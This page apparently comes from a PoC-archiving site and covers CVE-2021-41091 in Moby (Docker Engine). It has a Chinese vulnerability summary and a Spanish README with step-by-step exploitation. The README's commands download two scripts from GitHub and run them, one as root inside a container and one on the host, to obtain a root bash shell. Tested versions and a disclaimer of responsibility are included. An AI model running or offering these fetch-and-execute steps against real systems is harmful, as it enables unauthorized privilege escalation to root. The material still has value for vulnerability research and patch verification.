Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-41091 PoC — Moby 安全漏洞

Source
Associated Vulnerability
Title:Moby 安全漏洞 (CVE-2021-41091)
Description:Moby是一个开源项目,旨在推动软件的容器化,并帮助生态系统使容器技术主流化。 Moby 存在安全漏洞,该漏洞源于在Moby (Docker Engine)中发现了一个bug,数据目录(通常是var lib Docker )包含的子目录权限没有受到足够的限制,允许没有特权的Linux用户遍历目录内容和执行程序。攻击者可利用该漏洞当容器包含具有扩展权限位(如setuid )的可执行程序时,没有特权的Linux用户可以发现并执行这些程序。
Readme
# CVE-2021-41091

Un bug en Moby (Docker Engine) permite a usuarios sin privilegios atravesar directorios y ejecutar programas directamente del docker en la maquina principal, si en el docker existe un progrma suid el usuario lo podra ejecutar como suid en la maquina principal

## PoC

En la terminal del contenedor descargamos el archivo ```docker.sh```, luego lo ejecutamos como usuario root:
```bash
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh
```
Ahora en la maquina principal descargamos el archivo ```principal.sh``` y lo ejecutamos:
```bash
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh
```

Ejecutamos el comando que nos dara el archivo y seremos capaces de ejecutar la /bin/bash como root

## Notas

Estos scripts fueron probados en Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) con la version de Moby 20.10.5+dfsg1

EL USO DE ESTE REPOSITORIO ES RESPONSABILIDAD DE QUIEN LO UTILICE Y NO DE EL AUTOR
File Snapshot

[4.0K] /data/pocs/8bc5b6ce8a995af38e27717a54165040a58f8616 ├── [ 208] docker.sh ├── [1.0K] LICENSE ├── [ 460] principal.sh └── [1.0K] README.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.